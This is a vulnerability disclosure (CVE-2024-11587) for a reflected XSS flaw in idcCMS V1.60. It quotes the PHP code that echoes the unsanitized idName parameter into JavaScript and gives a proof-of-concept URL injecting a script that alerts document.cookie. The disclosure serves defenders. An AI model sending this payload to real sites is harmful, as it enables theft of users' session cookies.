idcCMS V1.60 has a reflected XSS vulnerability

[Hebing123]

Summary

A reflected Cross Site Scripting (XSS) vulnerability exists in idcCMS V1.60 due to improper sanitization of the $idName parameter in /inc/classProvCity.php.

Details

idcCMS V1.60 suffers from a Reflected Cross Site Scripting (XSS) vulnerability due to improper sanitization of the $idName parameter within the GetCityOptionJs method of the ProvCity class. This vulnerability can be exploited by an attacker to inject malicious scripts into the web application, which can then be executed in the browsers of other users.

// ···
class ProvCity{

	// 获取城市数据
	public static function GetDeal(){
		$idName		= trim(@$_GET['idName']);
		$prov		= trim(@$_GET['prov']);

		echo(ProvCity::GetCityOptionJs($idName, $prov, ''));
	}
// ···
	public static function GetCityOptionJs($idName,$prov,$defVal='no'){
		$provArr = self::GetCityArr($prov);

		$retStr = 'document.getElementById("'. $idName .'").options.length=0;';
		if ($defVal != 'no'){
			if (count($provArr) == 0 && strlen($defVal) == 0){
				$retStr .= 'document.getElementById("'. $idName .'").options.add(new Option("请先选择省份",""));';
			}else{
				$retStr .= 'document.getElementById("'. $idName .'").options.add(new Option("'. $defVal .'",""));';
			}
		}
		foreach ($provArr as $val){
			$retStr .= 'document.getElementById("'. $idName .'").options.add(new Option("'. $val .'","'. $val .'"));';
		}
		return $retStr;
	}
}

Proof of Concept (POC)

http://target-ip/read.php?idName=1%3Cscript%3Ealert(document.cookie)%3C/script%3E&mudi=getCityData

[Hebing123]

CVE-2024-11587